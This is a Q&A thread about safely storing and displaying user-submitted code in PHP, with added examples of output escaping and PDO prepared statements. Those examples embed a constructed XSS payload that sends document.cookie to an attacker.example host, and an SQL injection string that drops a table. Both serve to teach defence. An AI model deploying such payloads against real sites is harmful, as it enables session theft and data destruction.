Making users able to submit code: what to replace in PHP?
Hi, I'm planning to make users able to submit some pieces of code (PHP, Java, JavaScript, C++, etc... whatever they want, I mean).
So can anyone suggest the best practice to make it safe for my site? :))
I mean, which tags/chars/strings should be escaped in PHP once a code string is submitted?
If your intent is to display the code on screen, you do not need to escape or replace anything before storing it in your database (if you intend to store it). This doesn't apply, of course, to escaping for database insertion via something like mysql_real_escape_string(), for example (or your RDBMS's equivalent sanitization routine). That step is still absolutely necessary.
When displaying the code, just be sure that:
You DO NOT evaluate any submitted code via an eval() or system call.
When displaying code back to the browser, escape it with htmlspecialchars(). Never display it unescaped, or you will introduce cross-site scripting vulnerabilities.
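 
The output-escaping point above, as an added example (not code from the answer above): an unsafe renderer that concatenates the submission into the page sits beside the hardened one, and a constructed hostile "snippet" shows why the difference matters. It assumes PHP 8 or later (for str_contains) and that the page is served as UTF-8; the function names and the sample submission are made up for the example.

```php
<?php
// Added example, not from the original answer. Renders a user-submitted code
// snippet for display without ever evaluating it. Assumes PHP 8+ and a page
// served with: header('Content-Type: text/html; charset=UTF-8');

declare(strict_types=1);

// UNSAFE: raw input concatenated into markup. A submission that closes the
// <pre> tag and opens a <script> tag runs in every visitor's browser.
function render_snippet_unsafe(string $code): string
{
    return '<pre><code>' . $code . '</code></pre>';
}

// SAFE: encode the HTML-significant characters (& < > " ') at output time.
// ENT_QUOTES covers both quote styles, ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string, and the charset is explicit
// so the result does not depend on default_charset in php.ini.
function render_snippet(string $code): string
{
    $escaped = htmlspecialchars($code, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<pre><code>' . $escaped . '</code></pre>';
}

// Constructed hostile submission: it looks like JavaScript someone wants to
// share, but the real payload is the markup that breaks out of the <pre>.
$submitted = "console.log('hi');\n"
    . "</pre><script>document.location='https://attacker.example/?c='+document.cookie</script>";

$unsafe = render_snippet_unsafe($submitted);
$safe   = render_snippet($submitted);

// The unsafe rendering carries a live <script> tag; the safe one carries only
// the entity-encoded text of it, which the browser shows rather than runs.
if (!str_contains($unsafe, '<script>')) {
    throw new RuntimeException('expected the unsafe renderer to emit the tag');
}
if (str_contains($safe, '<script>') || !str_contains($safe, '&lt;script&gt;')) {
    throw new RuntimeException('escaping failed');
}

echo $safe, PHP_EOL;
```

Escape when you emit, not when you store: the stored text stays byte-identical, so the same snippet can later be offered as a download or shown in a different context with the encoding that context needs. This encoding is correct for HTML element content and for quoted attribute values; it is not sufficient for placing the text inside a `<script>` block or a JavaScript event handler, so keep submitted code out of those contexts entirely.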
Use placeholders in your queries and you don't even have to escape the input. Placeholders, binding, and prepared statements are definitely the preferred method.
It's faster for anything over one query, as you can reuse the handles and just change the input.
It's safer. The string is not interpreted with the query... ever. What you store is what you get.
I'd need to know a bit more about your target SQL to give pertinent examples, but here are some links:
PDO style binding: http://docs.php.net/pdo.prepared-statements
MySqli style binding: http://docs.php.net/manual/en/mysqli-stmt.bind-param.php
When you read it back, display with htmlspecialchars($string, ENT_QUOTES); the ENT_QUOTES option ensures that both single and double quotes get escaped.
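The placeholder approach recommended in this answer, as an added example (not code from the answer or from the PHP manual pages it links): a submitted snippet full of SQL and HTML metacharacters is stored and read back through PDO prepared statements with bound parameters, then escaped only when displayed. It assumes the pdo_sqlite extension, using an in-memory SQLite database so it runs offline; against MySQL only the DSN and credentials change. Table, column and function names are made up for the example.

```php
<?php
// Added example, not from the original answer. Requires PHP with pdo_sqlite.
// Stores a snippet via bound parameters (never string-building the SQL) and
// escapes it for HTML only at display time.

declare(strict_types=1);

function open_db(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
    $db->exec('CREATE TABLE snippets (id INTEGER PRIMARY KEY, lang TEXT NOT NULL, code TEXT NOT NULL)');
    return $db;
}

// The submission never becomes part of the SQL text; it travels as a bound
// parameter, so it needs no quoting or escaping (and must not get any, or the
// stored copy would differ from what the user typed).
function store_snippet(PDO $db, string $lang, string $code): int
{
    $stmt = $db->prepare('INSERT INTO snippets (lang, code) VALUES (:lang, :code)');
    $stmt->execute([':lang' => $lang, ':code' => $code]);
    return (int) $db->lastInsertId();
}

function load_snippet(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT lang, code FROM snippets WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// HTML escaping belongs here, at output, and nowhere earlier in the pipeline.
function display_snippet(array $row): string
{
    return '<pre class="lang-' . htmlspecialchars($row['lang'], ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($row['code'], ENT_QUOTES, 'UTF-8')
         . '</pre>';
}

// Constructed submission: every character here would be dangerous if the
// string were concatenated into SQL or into the page instead of bound/escaped.
$submitted = "SELECT * FROM users WHERE name = 'x'; -- ');\n"
    . "DROP TABLE snippets; --\n"
    . "<script>alert(\"xss\")</script>";

$db  = open_db();
$id  = store_snippet($db, 'sql', $submitted);
$row = load_snippet($db, $id);

// What you store is what you get: byte-for-byte identical, and the table the
// snippet "tried" to drop is still there with exactly one row.
if ($row === null || $row['code'] !== $submitted) {
    throw new RuntimeException('round trip altered the snippet');
}
if ((int) $db->query('SELECT COUNT(*) FROM snippets')->fetchColumn() !== 1) {
    throw new RuntimeException('table was not preserved');
}

echo display_snippet($row), PHP_EOL;
```

With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the server, not the client library, does the binding. The language tag is escaped above for completeness, but a value that ends up in a class name is better checked against a short allow-list (php, java, js, cpp, ...) before it is stored at all.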
You don't need to escape anything (other than the usual MySQL sanitation) if you don't intend to automatically run it.
I am no expert (I only got told about this yesterday), but at least for HTML, you could try and use htmlentities (look at this).
Once something has been converted using htmlentities, it becomes plain text, so if opened in a browser, you will see the tag and everything (e.g. it will write <a href="blah blah">); if it's written to a log or something else and then opened in a text-based editor, you will see some symbols and shnaz that represent the HTML entities.
If you need to convert back, you can use the html_entity_decode function, I think, but I am going to wager a guess and presume that you don't need to convert back.
For other languages, I have no idea what you should do.